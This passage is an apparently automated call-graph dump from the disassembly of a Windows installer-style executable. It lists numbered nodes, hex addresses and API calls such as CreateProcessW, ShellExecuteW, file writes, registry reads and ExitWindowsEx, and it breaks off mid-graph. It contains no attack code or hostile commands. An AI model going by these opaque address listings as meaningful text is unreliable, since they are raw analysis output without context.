3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 